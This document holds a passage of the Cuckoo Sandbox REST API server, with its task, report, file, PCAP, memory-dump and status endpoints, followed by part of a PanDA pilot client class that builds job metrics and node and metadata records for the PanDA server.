response = {}
task = db.view_task(task_id, details=True)
if task:
entry = task.to_dict()
entry["guest"] = {}
if task.guest:
entry["guest"] = task.guest.to_dict()
entry["errors"] = []
for error in task.errors:
entry["errors"].append(error.message)
entry["sample"] = {}
if task.sample_id:
sample = db.view_sample(task.sample_id)
entry["sample"] = sample.to_dict()
response["task"] = entry
else:
r = jsonify(message="Task not found")
r.status_code = 404
return r
return jsonify(response)
@app.route("/tasks/reschedule/<int:task_id>")
@app.route("/tasks/reschedule/<int:task_id>/<int:priority>")
@app.route("/v1/tasks/reschedule/<int:task_id>")
@app.route("/v1/tasks/reschedule/<int:task_id>/<int:priority>")
def tasks_reschedule(task_id, priority=None):
response = {}
if not db.view_task(task_id):
return json_error(404, "There is no analysis with the specified ID")
new_task_id = db.reschedule(task_id, priority)
if new_task_id:
response["status"] = "OK"
response["task_id"] = new_task_id
else:
return json_error(500, "An error occurred while trying to "
"reschedule the task")
return jsonify(response)
@app.route("/tasks/delete/<int:task_id>")
@app.route("/v1/tasks/delete/<int:task_id>")
def tasks_delete(task_id):
response = {}
task = db.view_task(task_id)
if task:
if task.status == TASK_RUNNING:
return json_error(500, "The task is currently being "
"processed, cannot delete")
if db.delete_task(task_id):
delete_folder(os.path.join(CUCKOO_ROOT, "storage",
"analyses", "%d" % task_id))
response["status"] = "OK"
else:
return json_error(500, "An error occurred while trying to "
"delete the task")
else:
return json_error(404, "Task not found")
return jsonify(response)
@app.route("/tasks/report/<int:task_id>")
@app.route("/v1/tasks/report/<int:task_id>")
@app.route("/tasks/report/<int:task_id>/<report_format>")
@app.route("/v1/tasks/report/<int:task_id>/<report_format>")
def tasks_report(task_id, report_format="json"):
formats = {
"json": "report.json",
"html": "report.html",
}
bz_formats = {
"all": {"type": "-", "files": ["memory.dmp"]},
"dropped": {"type": "+", "files": ["files"]},
"package_files": {"type": "+", "files": ["package_files"]},
}
tar_formats = {
"bz2": "w:bz2",
"gz": "w:gz",
"tar": "w",
}
if report_format.lower() in formats:
report_path = os.path.join(CUCKOO_ROOT, "storage", "analyses",
"%d" % task_id, "reports",
formats[report_format.lower()])
elif report_format.lower() in bz_formats:
bzf = bz_formats[report_format.lower()]
srcdir = os.path.join(CUCKOO_ROOT, "storage",
"analyses", "%d" % task_id)
s = StringIO()
# By default go for bz2 encoded tar files (for legacy reasons).
tarmode = tar_formats.get(request.args.get("tar"), "w:bz2")
tar = tarfile.open(fileobj=s, mode=tarmode, dereference=True)
for filedir in os.listdir(srcdir):
filepath = os.path.join(srcdir, filedir)
if not os.path.exists(filepath):
continue
if bzf["type"] == "-" and filedir not in bzf["files"]:
tar.add(filepath, arcname=filedir)
if bzf["type"] == "+" and filedir in bzf["files"]:
tar.add(filepath, arcname=filedir)
tar.close()
response = make_response(s.getvalue())
response.headers["Content-Type"] = \
"application/x-tar; charset=UTF-8"
return response
else:
return json_error(400, "Invalid report format")
if os.path.exists(report_path):
if report_format == "json":
response = make_response(open(report_path, "rb").read())
response.headers["Content-Type"] = "application/json"
return response
else:
return open(report_path, "rb").read()
else:
return json_error(404, "Report not found")
@app.route("/tasks/screenshots/<int:task_id>")
@app.route("/v1/tasks/screenshots/<int:task_id>")
@app.route("/tasks/screenshots/<int:task_id>/<screenshot>")
@app.route("/v1/tasks/screenshots/<int:task_id>/<screenshot>")
def task_screenshots(task_id=0, screenshot=None):
folder_path = os.path.join(CUCKOO_ROOT, "storage", "analyses", str(task_id), "shots")
if os.path.exists(folder_path):
if screenshot:
screenshot_name = "{0}.jpg".format(screenshot)
screenshot_path = os.path.join(folder_path, screenshot_name)
if os.path.exists(screenshot_path):
# TODO: Add content disposition.
response = make_response(open(screenshot_path, "rb").read())
response.headers["Content-Type"] = "image/jpeg"
return response
else:
return json_error(404, "Screenshot not found!")
else:
zip_data = StringIO()
with ZipFile(zip_data, "w", ZIP_STORED) as zip_file:
for shot_name in os.listdir(folder_path):
zip_file.write(os.path.join(folder_path, shot_name), shot_name)
# TODO: Add content disposition.
response = make_response(zip_data.getvalue())
response.headers["Content-Type"] = "application/zip"
return response
return json_error(404, "Task not found")
@app.route("/tasks/rereport/<int:task_id>")
def rereport(task_id):
task = db.view_task(task_id)
if task:
if task.status == TASK_REPORTED:
db.set_status(task_id, TASK_COMPLETED)
return jsonify(success=True)
return jsonify(success=False)
else:
return json_error(404, "Task not found")
@app.route("/tasks/reboot/<int:task_id>")
def reboot(task_id):
reboot_id = Database().add_reboot(task_id=task_id)
if not reboot_id:
return json_error(404, "Error creating reboot task")
return jsonify(task_id=task_id, reboot_id=reboot_id)
@app.route("/files/view/md5/<md5>")
@app.route("/v1/files/view/md5/<md5>")
@app.route("/files/view/sha256/<sha256>")
@app.route("/v1/files/view/sha256/<sha256>")
@app.route("/files/view/id/<int:sample_id>")
@app.route("/v1/files/view/id/<int:sample_id>")
def files_view(md5=None, sha256=None, sample_id=None):
response = {}
if md5:
sample = db.find_sample(md5=md5)
elif sha256:
sample = db.find_sample(sha256=sha256)
elif sample_id:
sample = db.view_sample(sample_id)
else:
return json_error(400, "Invalid lookup term")
if sample:
response["sample"] = sample.to_dict()
else:
return json_error(404, "File not found")
return jsonify(response)
@app.route("/files/get/<sha256>")
@app.route("/v1/files/get/<sha256>")
def files_get(sha256):
file_path = os.path.join(CUCKOO_ROOT, "storage", "binaries", sha256)
if os.path.exists(file_path):
response = make_response(open(file_path, "rb").read())
response.headers["Content-Type"] = \
"application/octet-stream; charset=UTF-8"
return response
else:
return json_error(404, "File not found")
@app.route("/pcap/get/<int:task_id>")
@app.route("/v1/pcap/get/<int:task_id>")
def pcap_get(task_id):
file_path = os.path.join(CUCKOO_ROOT, "storage", "analyses",
"%d" % task_id, "dump.pcap")
if os.path.exists(file_path):
try:
# TODO This could be a big file, so eventually we have to switch
# to app.send_static_file() instead.
response = make_response(open(file_path, "rb").read())
response.headers["Content-Type"] = \
"application/octet-stream; charset=UTF-8"
return response
except:
return json_error(500, "An error occurred while reading PCAP")
else:
return json_error(404, "File not found")
@app.route("/machines/list")
@app.route("/v1/machines/list")
def machines_list():
response = {}
machines = db.list_machines()
response["machines"] = []
for row in machines:
response["machines"].append(row.to_dict())
return jsonify(response)
@app.route("/machines/view/<name>")
@app.route("/v1/machines/view/<name>")
def machines_view(name=None):
response = {}
machine = db.view_machine(name=name)
if machine:
response["machine"] = machine.to_dict()
else:
return json_error(404, "Machine not found")
return jsonify(response)
@app.route("/cuckoo/status")
@app.route("/v1/cuckoo/status")
def cuckoo_status():
# In order to keep track of the diskspace statistics of the temporary
# directory we create a temporary file so we can statvfs() on that.
temp_file = store_temp_file("", "status")
paths = dict(
binaries=os.path.join(CUCKOO_ROOT, "storage", "binaries"),
analyses=os.path.join(CUCKOO_ROOT, "storage", "analyses"),
temporary=temp_file,
)
diskspace = {}
for key, path in paths.items():
if hasattr(os, "statvfs") and os.path.isdir(path):
stats = os.statvfs(path)
diskspace[key] = dict(
free=stats.f_bavail * stats.f_frsize,
total=stats.f_blocks * stats.f_frsize,
used=(stats.f_blocks - stats.f_bavail) * stats.f_frsize,
)
# Now we remove the temporary file and its parent directory.
os.unlink(temp_file)
os.rmdir(os.path.dirname(temp_file))
# Get the CPU load.
if hasattr(os, "getloadavg"):
cpuload = os.getloadavg()
else:
cpuload = []
if os.path.isfile("/proc/meminfo"):
values = {}
for line in open("/proc/meminfo"):
key, value = line.split(":", 1)
values[key.strip()] = value.replace("kB", "").strip()
if "MemAvailable" in values and "MemTotal" in values:
memory = 100.0 * int(values["MemFree"]) / int(values["MemTotal"])
else:
memory = None
else:
memory = None
response = dict(
version=CUCKOO_VERSION,
hostname=socket.gethostname(),
machines=dict(
total=len(db.list_machines()),
available=db.count_machines_available()
),
tasks=dict(
total=db.count_tasks(),
pending=db.count_tasks("pending"),
running=db.count_tasks("running"),
completed=db.count_tasks("completed"),
reported=db.count_tasks("reported")
),
diskspace=diskspace,
cpuload=cpuload,
memory=memory,
)
return jsonify(response)
@app.route("/memory/list/<int:task_id>")
def memorydumps_list(task_id):
folder_path = os.path.join(CUCKOO_ROOT, "storage", "analyses", str(task_id), "memory")
if os.path.exists(folder_path):
memory_files = []
memory_path = os.path.join(CUCKOO_ROOT, "storage", "analyses", str(task_id), "memory")
for subdir, dirs, files in os.walk(memory_path):
for filename in files:
memory_files.append(filename.replace(".dmp", ""))
if len(memory_files) == 0:
return json_error(404, "Memory dump not found")
return jsonify({"dump_files": memory_files})
else:
return json_error(404, "Memory dump not found")
@app.route("/memory/get/<int:task_id>/<pid>")
def memorydumps_get(task_id, pid=None):
folder_path = os.path.join(CUCKOO_ROOT, "storage", "analyses", str(task_id), "memory")
if os.path.exists(folder_path):
if pid:
pid_name = "{0}.dmp".format(pid)
pid_path = os.path.join(folder_path, pid_name)
if os.path.exists(pid_path):
response = make_response(open(pid_path, "rb").read())
response.headers["Content-Type"] = \
"application/octet-stream; charset=UTF-8"
return response
else:
return json_error(404, "Memory dump not found")
else:
return json_error(404, "Memory dump not found")
else:
return json_error(404, "Memory dump not found")
@app.route("/vpn/status")
def vpn_status():
status = rooter("vpn_status")
if status is None:
return json_error(500, "Rooter not available")
return jsonify({"vpns": status})
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument("-H", "--host", help="Host to bind the API server on",
default="localhost", action="store", required=False)
parser.add_argument("-p", "--port", help="Port to bind the API server on",
default=8090, action="store", required=False)
parser.add_argument("-u", "--user", type=str,
help="Drop user privileges to this user")
args = parser.parse_args()
if args.user:
drop_privileges(args.user)
app.run(host=args.host, port=int(args.port))
| |
import os
import traceback
from time import time, gmtime, strftime
from datetime import date
from commands import getstatusoutput, getoutput
from shutil import copy2
from PilotErrors import PilotErrors
from pUtil import tolog, readpar, timeStamp, getBatchSystemJobID, getCPUmodel, PFCxml, updateMetadata, addSkippedToPFC,\
makeHTTPUpdate, tailPilotErrorDiag, isLogfileCopied, updateJobState, updateXMLWithSURLs, getMetadata, toPandaLogger,\
getSiteInformation, getExperiment, readStringFromFile, merge_dictionaries, updateXMLWithEndpoints, isAnalysisJob
from JobState import JobState
from FileStateClient import getFilesOfState
from FileHandling import getOSTransferDictionaryFilename, getOSTransferDictionary, getHighestPriorityError
class PandaServerClient:
"""
Client to the Panda Server
Methods for communicating with the Panda Server
"""
# private data members
__errorString = "!!WARNING!!1992!! %s" # default error string
__error = PilotErrors() # PilotErrors object
__pilot_version_tag = ""
__pilot_initdir = ""
__jobSchedulerId = ""
__pilotId = ""
__updateServer = True
__jobrec = False
__pshttpurl = ""
def __init__(self, pilot_version="", pilot_version_tag="", pilot_initdir="", jobSchedulerId=None, pilotId=None, updateServer=True, jobrec=False, pshttpurl=""):
""" Default initialization """
self.__pilot_version_tag = pilot_version_tag
self.__pilot_initdir = pilot_initdir
self.__jobSchedulerId = jobSchedulerId
self.__pilotId = pilotId
self.__updateServer = updateServer
self.__jobrec = jobrec
self.__pshttpurl = pshttpurl
self.__pilot_version = pilot_version
def getNodeStructureFromFile(self, workDir, jobId):
""" get the node structure from the Job State file """
JS = JobState()
_node = None
# open the job state file
tolog("workDir: %s" % (workDir))
tolog("jobId: %s" % (jobId))
filename = JS.getFilename(workDir, jobId)
tolog("filename: %s" % (filename))
if os.path.exists(filename):
# load the objects
if JS.get(filename):
# decode the job state info
_job, _site, _node, _recoveryAttempt = JS.decode()
else:
tolog("JS.decode() failed to load objects")
else:
tolog("%s does not exist" % (filename))
return _node
def copyNodeStruct4NG(self, node):
""" store the node structure for ARC """
from pickle import dump
try:
_fname = "%s/panda_node_struct.pickle" % os.getcwd()
fp = open(_fname, "w")
except Exception, e:
tolog("!!WARNING!!2999!! Could not store panda node structure: %s" % str(e))
else:
try:
dump(node, fp)
fp.close()
except Exception, e:
tolog("!!WARNING!!2999!! Could not dump panda node structure: %s" % str(e))
else:
tolog("Stored panda node structure at: %s" % (_fname))
tolog("node : %s" % (str(node)))
try:
copy2(_fname, self.__pilot_initdir)
except Exception, e:
tolog("!!WARNING!!2999!! Could not copy panda node structure to init dir: %s" % str(e))
else:
tolog("Copied panda node structure (%s) to init dir: %s" % (_fname, self.__pilot_initdir))
def jobMetric(self, key="", value=""):
""" Add 'key'='value' to the jobMetrics """
# Use this method to avoid missing the separating space between key-value pairs in the job metrics
if key != "" and value != "":
# Add a space at the end since there might be several key values added
jobMetric = "%s=%s " % (key, value)
else:
jobMetric = ""
return jobMetric
def getJobMetrics(self, job, site, workerNode):
""" Return a properly formatted job metrics string """
# style: Number of events read | Number of events written | vmPeak maximum | vmPeak average | RSS average | JEM activation
# format: nEvents=<int> nEventsW=<int> vmPeakMax=<int> vmPeakMean=<int> RSSMean=<int> JEM=<string>
# hs06=<float> shutdownTime=<int> cpuFactor=<float> cpuLimit=<float> diskLimit=<float> jobStart=<int> memLimit=<int> runLimit=<float>
# get the experiment object
thisExperiment = getExperiment(job.experiment)
if "HPC_HPC" in readpar('catchall'):
if job.coreCount is None:
job.coreCount = 0
else:
if job.coreCount:
# Always use the ATHENA_PROC_NUMBER first, if set
if os.environ.has_key('ATHENA_PROC_NUMBER'):
try:
job.coreCount = int(os.environ['ATHENA_PROC_NUMBER'])
except Exception, e:
tolog("ATHENA_PROC_NUMBER is not properly set: %s (will use existing job.coreCount value)" % (e))
else:
try:
job.coreCount = int(os.environ['ATHENA_PROC_NUMBER'])
except:
tolog("env ATHENA_PROC_NUMBER is not set. corecount is not set")
coreCount = job.coreCount
jobMetrics = ""
if coreCount is not None and coreCount != "NULL" and coreCount != 'null':
jobMetrics += self.jobMetric(key="coreCount", value=coreCount)
if job.nEvents > 0:
jobMetrics += self.jobMetric(key="nEvents", value=job.nEvents)
if job.nEventsW > 0:
jobMetrics += self.jobMetric(key="nEventsW", value=job.nEventsW)
if job.external_stageout_time:
jobMetrics += self.jobMetric(key="ExStageoutTime", value=job.external_stageout_time)
# hpc status
#if job.mode:
# jobMetrics += self.jobMetric(key="mode", value=job.mode)
#if job.hpcStatus:
# jobMetrics += self.jobMetric(key="HPCStatus", value=job.hpcStatus)
if job.yodaJobMetrics:
for key in job.yodaJobMetrics:
if key == 'startTime' or key == 'endTime':
value = strftime("%Y-%m-%d %H:%M:%S", gmtime(job.yodaJobMetrics[key]))
jobMetrics += self.jobMetric(key=key, value=value)
elif key.startswith("min") or key.startswith("max"):
pass
else:
jobMetrics += self.jobMetric(key=key, value=job.yodaJobMetrics[key])
#if job.HPCJobId:
# jobMetrics += self.jobMetric(key="HPCJobId", value=job.HPCJobId)
# eventservice zip file
if job.outputZipName and job.outputZipBucketID:
jobMetrics += self.jobMetric(key="outputZipName", value=os.path.basename(job.outputZipName))
jobMetrics += self.jobMetric(key="outputZipBucketID", value=job.outputZipBucketID)
# report alternative stage-out in case alt SE method was used
# (but not in job recovery mode)
recovery_mode = False
if job.filesAltStageOut > 0 and not recovery_mode:
#_jobMetrics = ""
#_jobMetrics += " filesAltStageOut=%d" % (job.filesAltStageOut)
#_jobMetrics += " filesNormalStageOut=%d" % (job.filesNormalStageOut)
#tolog("Could have reported: %s" % (_jobMetrics))
# Report which output files were moved to an alternative SE
filenames = getFilesOfState(site.workdir, job.jobId, state="alt_transferred")
if filenames != "":
jobMetrics += self.jobMetric(key="altTransferred", value=filenames)
# report on which OS bucket the log was written to, if any
if job.logBucketID != -1:
jobMetrics += self.jobMetric(key="logBucketID", value=job.logBucketID)
# only add the JEM bit if explicitly set to YES, otherwise assumed to be NO
if job.JEM == "YES":
jobMetrics += self.jobMetric(key="JEM", value=1)
# old format: jobMetrics += " JEM=%s" % (job.JEM)
if job.dbTime != "":
jobMetrics += self.jobMetric(key="dbTime", value=job.dbTime)
if job.dbData != "":
jobMetrics += self.jobMetric(key="dbData", value=job.dbData)
# machine and job features, max disk space used by the payload
jobMetrics += workerNode.addToJobMetrics(job.result[0], self.__pilot_initdir, job.jobId)
si = getSiteInformation(job.experiment)
_jobMetrics = ""
# report any OS transfers
#message = self.getOSJobMetrics()
#if message != "":
# _jobMetrics = self.jobMetric(key="OS", value=message)
# tolog("Could have added: %s to job metrics" % (_jobMetrics))
# correct for potential initial and trailing space
jobMetrics = jobMetrics.lstrip().rstrip()
if jobMetrics != "":
tolog('Job metrics=\"%s\"' % (jobMetrics))
else:
tolog("No job metrics (all values are zero)")
# is jobMetrics within allowed size?
if len(jobMetrics) > 500:
tolog("!!WARNING!!2223!! jobMetrics out of size (%d)" % (len(jobMetrics)))
# try to reduce the field size and remove the last entry which might be cut
jobMetrics = jobMetrics[:500]
jobMetrics = " ".join(jobMetrics.split(" ")[:-1])
tolog("jobMetrics has been reduced to: %s" % (jobMetrics))
return jobMetrics
# deprecated
def getOSJobMetrics(self):
""" Generate the objectstore jobMetrics message """
# Message format:
# OS=<os_name_0>:<os_bucket_endpoint_0>:<os_bucket_endpoint_1>: ..
# Example:
# os_name = BNL_OS_0, os_bucket_name = atlas_eventservice_F0 or atlas_logs_3D (where F0 and 3D are examples of file name hashes)
# -> OS=BNL_OS_0;atlas_eventservice_F0:atlas_logs_3D
# (note: at least one os_bucket_endpoint will be included in a message, but not necessarily both of them and order is random)
message = ""
# Locate the OS transfer dictionary
filename = getOSTransferDictionaryFilename()
path = os.path.join(self.__pilot_initdir, filename)
if os.path.exists(path):
# Which OS's were used?
os_names_dictionary = getOSTransferDictionary(path)
if os_names_dictionary != {}:
message = ""
os_names = os_names_dictionary.keys()
# Note: the should only be one os_name
if len(os_names) > 1:
tolog("!!WARNING!!2345!! Can only report one ddm endpoint (will use first only): %s" % (os_names_dictionary))
# Which buckets were written to?
for os_name in os_names_dictionary.keys():
message += os_name + ";"
bucket_list = os_names_dictionary[os_name]
for os_bucket_endpoint in bucket_list:
message += os_bucket_endpoint + ":"
# Remove the last ':'
message = message[:-1]
# Ignore any other os_names - there should one be one and we can only report one
break
else:
tolog("!!WARNING!!3335!! No OS transfers were found in: %s" % (filename))
else:
tolog("OS transfer dictionary does not exist, will not report OS transfers in jobMetrics (%s)" % (path))
return message
def getNodeStructure(self, job, site, workerNode, spaceReport=False, log=None):
""" define the node structure expected by the server """
node = {}
node['node'] = workerNode.nodename
node['workdir'] = job.workdir
node['siteName'] = site.sitename
node['jobId'] = job.jobId
node['state'] = job.result[0]
node['timestamp'] = timeStamp()
if job.attemptNr > -1:
node['attemptNr'] = job.attemptNr
if self.__jobSchedulerId:
node['schedulerID'] = self.__jobSchedulerId
if self.__pilotId:
use_newmover = str(readpar('use_newmover')).lower() in ["1", "true"]
use_newmover_tag = 'NEWMOVER-%s' % ('ON' if use_newmover else 'OFF')
tolog("Checking if new site movers workflow is enabled: use_newmover=%s" % use_newmover)
# report the batch system job id, if available
batchSystemType, _id = getBatchSystemJobID()
if batchSystemType:
tolog("Batch system: %s" % batchSystemType)
tolog("Batch system job ID: %s" % _id)
node['pilotID'] = "%s|%s|%s|%s|%s" % (self.__pilotId, use_newmover_tag, batchSystemType, self.__pilot_version_tag, self.__pilot_version)
node['batchID'] = _id
tolog("Will send batchID: %s and pilotID: %s" % (node['batchID'], node['pilotID']))
else:
tolog("Batch system type was not identified (will not be reported)")
node['pilotID'] = "%s|%s|%s|%s" % (self.__pilotId, use_newmover_tag, self.__pilot_version_tag, self.__pilot_version)
tolog("Will send pilotID: %s" % node['pilotID'])
tolog("pilotId: %s" % str(self.__pilotId))
if log and (job.result[0] == 'failed' or job.result[0] == 'holding' or "outbound connections" in log):
node['pilotLog'] = log
# add the startTime if the file exists
_filename = 'START_TIME_%s' % (job.jobId)
_path = os.path.join(self.__pilot_initdir, _filename)
if os.path.exists(_path):
startTime = readStringFromFile(_path)
node['startTime'] = startTime
if job.yodaJobMetrics:
if 'startTime' in job.yodaJobMetrics and job.yodaJobMetrics['startTime']:
node['startTime'] = strftime("%Y-%m-%d %H:%M:%S", gmtime(job.yodaJobMetrics['startTime']))
#job.yodaJobMetrics['startTime'] = node['startTime']
if 'endTime' in job.yodaJobMetrics and job.yodaJobMetrics['endTime']:
node['endTime'] = strftime("%Y-%m-%d %H:%M:%S", gmtime(job.yodaJobMetrics['endTime']))
#job.yodaJobMetrics['endTime'] = node['endTime']
# build the jobMetrics
node['jobMetrics'] = self.getJobMetrics(job, site, workerNode)
# for hpc status
if job.hpcStatus:
node['jobSubStatus'] = job.hpcStatus
tolog("jobSubStatus: %s" % job.subStatus)
if job.subStatus:
node['jobSubStatus'] = job.subStatus
if job.coreCount and job.coreCount != 'null' and job.coreCount != 'NULL':
node['coreCount'] = job.coreCount
if job.HPCJobId:
node['batchID'] = job.HPCJobId
# check to see if there were any high priority errors reported
errorInfo = getHighestPriorityError(job.jobId, self.__pilot_initdir)
if errorInfo != {}:
try:
pilotErrorCode = errorInfo['pilotErrorCode']
pilotErrorDiag = errorInfo['pilotErrorDiag']
except Exception, e:
tolog("!!WARNING!!2323!! Exception caught: %s" % (e))
else:
# Overwrite any existing errors
if pilotErrorCode == 0 and job.result[2] != 0:
tolog('Encountered bad high priority error code %d (will not overwrite error code %d)' % (pilotErrorCode, job.result[2]))
else:
if job.result[2] != 0:
tolog("Encountered high priority error code %d (will overwrite error code %d)" % (pilotErrorCode, job.result[2]))
else:
tolog("Encountered high priority error code %d" % (pilotErrorCode))
job.result[2] = pilotErrorCode
job.pilotErrorDiag = pilotErrorDiag
else:
tolog("Did not find any reported high priority errors")
# send pilotErrorDiag for finished, failed and holding jobs
if job.result[0] == 'finished' or job.result[0] == 'failed' or job.result[0] == 'holding':
# get the pilot error diag from the right source
if job.pilotErrorDiag:
if job.pilotErrorDiag == "":
node['pilotErrorDiag'] = tailPilotErrorDiag(self.__error.getPilotErrorDiag(job.result[2]))
job.pilotErrorDiag = node['pilotErrorDiag']
tolog("Empty pilotErrorDiag set to: %s" % (job.pilotErrorDiag))
elif job.pilotErrorDiag.upper().find("<HTML>") >= 0:
tolog("Found html in pilotErrorDiag: %s" % (job.pilotErrorDiag))
node['pilotErrorDiag'] = self.__error.getPilotErrorDiag(job.result[2])
job.pilotErrorDiag = node['pilotErrorDiag']
tolog("Updated pilotErrorDiag: %s" % (job.pilotErrorDiag))
else:
# truncate if necesary
if len(job.pilotErrorDiag) > 250:
tolog("pilotErrorDiag will be truncated to size 250")
tolog("Original pilotErrorDiag message: %s" % (job.pilotErrorDiag))
job.pilotErrorDiag = job.pilotErrorDiag[:250]
# set the pilotErrorDiag, but only the last 256 characters
node['pilotErrorDiag'] = tailPilotErrorDiag(job.pilotErrorDiag)
else:
# set the pilotErrorDiag, but only the last 256 characters
job.pilotErrorDiag = self.__error.getPilotErrorDiag(job.result[2])
node['pilotErrorDiag'] = tailPilotErrorDiag(job.pilotErrorDiag)
tolog("Updated pilotErrorDiag from None: %s" % (job.pilotErrorDiag))
# get the number of events, should report in heartbeat in case of preempted.
if job.nEvents != 0:
node['nEvents'] = job.nEvents
tolog("Total number of processed events: %d (read)" % (job.nEvents))
else:
tolog("Payload/TRF did not report the number of read events")
try:
# report CPUTime and CPUunit at the end of the job
try:
constime = int(job.cpuConsumptionTime)
except:
constime = None
if constime:
if constime < 10**9:
node['cpuConsumptionTime'] = job.cpuConsumptionTime
else:
tolog("!!WARNING!!2222!! Unrealistic cpuConsumptionTime: %s (reset to -1)" % job.cpuConsumptionTime)
node['cpuConsumptionTime'] = "-1"
except:
tolog("Failed to get cpu time: %s" % traceback.format_exc())
try:
node['cpuConsumptionUnit'] = job.cpuConsumptionUnit + "+" + getCPUmodel()
except:
node['cpuConsumptionUnit'] = '?'
node['cpuConversionFactor'] = job.cpuConversionFactor
if job.result[0] == 'finished' or job.result[0] == 'failed':
# make sure there is no mismatch between the transformation error codes (when both are reported)
# send transformation errors depending on what is available
if job.exeErrorDiag != "":
node['exeErrorCode'] = job.exeErrorCode
node['exeErrorDiag'] = job.exeErrorDiag
# verify that exeErrorCode is set, if not, use the info in result[1]
if job.exeErrorCode == 0:
tolog("WARNING: job.exeErrorDiag is set but not job.exeErrorCode: setting it to: %d" % (job.result[1]))
job.exeErrorCode = job.result[1]
node['exeErrorCode'] = job.exeErrorCode
else:
node['transExitCode'] = job.result[1]
if (job.result[0] == 'failed') and (job.exeErrorCode != 0) and (job.result[1] != job.exeErrorCode):
if log:
mismatch = "MISMATCH | Trf error code mismatch: exeErrorCode = %d, transExitCode = %d" %\
(job.exeErrorCode, job.result[1])
if node.has_key('pilotLog'):
node['pilotLog'] = mismatch + node['pilotLog']
else:
tolog("!!WARNING!!1300!! Could not write mismatch error to log extracts: %s" % mismatch)
# check if Pilot-controlled resubmission is required:
analyJob = isAnalysisJob(job.trf.split(",")[0])
if (job.result[0] == "failed" and analyJob):
pilotExitCode = job.result[2]
error = PilotErrors()
if (error.isPilotResubmissionErrorCode(pilotExitCode) or job.isPilotResubmissionRequired):
# negate PilotError, ensure it's negative
job.result[2] = -abs(pilotExitCode)
tolog("(Negated error code)")
else:
tolog("(No need to negate error code)")
node['pilotErrorCode'] = job.result[2]
tolog("Pilot error code: %d" % (node['pilotErrorCode']))
# report specific time measures
# node['pilotTiming'] = "getJob=%s setup=%s stageIn=%s payload=%s stageOut=%s" % (job.timeGetJob, job.timeSetup, job.timeStageIn, job.timeExe, job.timeStageOut)
node['pilotTiming'] = "%s|%s|%s|%s|%s" % (job.timeGetJob, job.timeStageIn, job.timeExe, job.timeStageOut, job.timeSetup)
elif job.result[0] == 'holding':
node['exeErrorCode'] = job.result[2]
node['exeErrorDiag'] = self.__error.getPilotErrorDiag(job.result[2])
else:
node['cpuConsumptionUnit'] = getCPUmodel()
# Add the utility info if it is available
thisExperiment = getExperiment(job.experiment)
if thisExperiment.shouldExecuteUtility():
utility_node = thisExperiment.getUtilityInfo(job.workdir, self.__pilot_initdir, allowTxtFile=True)
node = merge_dictionaries(node, utility_node)
return node
def getXML(self, job, sitename, workdir, xmlstr=None, jr=False):
""" Get the metadata xml """
node_xml = ""
tolog("getXML called")
# for backwards compatibility
try:
experiment = job.experiment
except:
experiment = "unknown"
# do not send xml for state 'holding' (will be sent by a later pilot during job recovery)
if job.result[0] == 'holding' and sitename != "CERNVM":
pass
else:
# only create and send log xml if the log was transferred
if job.result[0] == 'failed' and isLogfileCopied(workdir, job.jobId):
# generate the xml string for log file
# at this time the job.workdir might have been removed (because this function can be called
# after the removal of workdir is done), so we make a new dir
xmldir = "%s/XML4PandaJob_%s" % (workdir, job.jobId)
# group rw permission added as requested by LYON
ec, rv = getstatusoutput("mkdir -m g+rw %s" % (xmldir))
if ec != 0:
tolog("!!WARNING!!1300!! Could not create xmldir from updatePandaServer: %d, %s (resetting to site workdir)" % (ec, rv))
cmd = "ls -l %s" % (xmldir)
out = getoutput(cmd)
tolog("%s \n%s" % (cmd, out))
xmldir = workdir
if os.environ.has_key('Nordugrid_pilot'):
fname = os.path.join(self.__pilot_initdir, job.logFile)
else:
fname = os.path.join(workdir, job.logFile)
if os.path.exists(fname):
fnamelog = "%s/logfile.xml" % (xmldir)
guids_status = PFCxml(experiment, fnamelog, fntag="lfn", alog=job.logFile, alogguid=job.tarFileGuid, jr=jr, logToOS=job.putLogToOS)
from SiteMover import SiteMover
ec, pilotErrorDiag, _fsize, _checksum = SiteMover.getLocalFileInfo(fname, csumtype="adler32")
if ec != 0:
tolog("!!WARNING!!1300!! getLocalFileInfo failed: (%d, %s, %s)" % (ec, str(_fsize), str(_checksum)))
tolog("!!WARNING!!1300!! Can not set XML (will not be sent to server)")
node_xml = ''
else:
ec, _strXML = updateMetadata(fnamelog, _fsize, _checksum)
if ec == 0:
tolog("Added (%s, %s) to metadata file (%s)" % (_fsize, _checksum, fnamelog))
else:
tolog("!!WARNING!!1300!! Could not add (%s, %s) to metadata file (%s). XML will be incomplete: %d" %\
(_fsize, _checksum, fnamelog, ec))
# add skipped file info
_skippedfname = os.path.join(workdir, "skipped.xml")
if os.path.exists(_skippedfname):
ec = addSkippedToPFC(fnamelog, _skippedfname)
try:
f = open(fnamelog)
except Exception,e:
tolog("!!WARNING!!1300!! Exception caught: Can not open the file %s: %s (will not send XML)" %\
(fnamelog, str(e)))
node_xml = ''
else:
node_xml = ''
for line in f:
node_xml += line
f.close()
# transfer logfile.xml to pilot init dir for Nordugrid
if os.environ.has_key('Nordugrid_pilot'):
try:
copy2(fnamelog, self.__pilot_initdir)
except Exception, e:
tolog("!!WARNING!!1600!! Exception caught: Could not copy NG log metadata file to init dir: %s" % str(e))
else:
tolog("Successfully copied NG log metadata file to pilot init dir: %s" % (self.__pilot_initdir))
else: # log file does not exist anymore
if isLogfileCopied(workdir, job.jobId):
tolog("Log file has already been copied and removed")
if not os.environ.has_key('Nordugrid_pilot'):
# only send xml with log info if the log has been transferred
if xmlstr:
node_xml = xmlstr
tolog("Found xml anyway (stored since before)")
else:
node_xml = ''
tolog("!!WARNING!!1300!! XML not found, nothing to send to server")
else:
tolog("!!WARNING!!1300!! File %s does not exist and transfer lockfile not found (job from old pilot?)" % (fname))
node_xml = ''
elif xmlstr:
# xmlstr was set in postJobTask for all files
tolog("XML string set")
_skippedfname = os.path.join(workdir, "skipped.xml")
fname = "%s/metadata-%s.xml" % (workdir, job.jobId)
if os.path.exists(fname):
if os.path.exists(_skippedfname):
# add the skipped file info if needed
ec = addSkippedToPFC(fname, _skippedfname)
# transfer metadata to pilot init dir for Nordugrid
if os.environ.has_key('Nordugrid_pilot'):
try:
copy2(fname, self.__pilot_initdir)
except Exception, e:
tolog("!!WARNING!!1600!! Exception caught: Could not copy metadata file to init dir for NG: %s" % str(e))
else:
tolog("Successfully copied metadata file to pilot init dir for NG: %s" % (self.__pilot_initdir))
else:
tolog("Warning: Metadata does not exist: %s" % (fname))
tolog("Will send XML")
node_xml = xmlstr
# we don't need the job's log file anymore, delete it (except for NG)
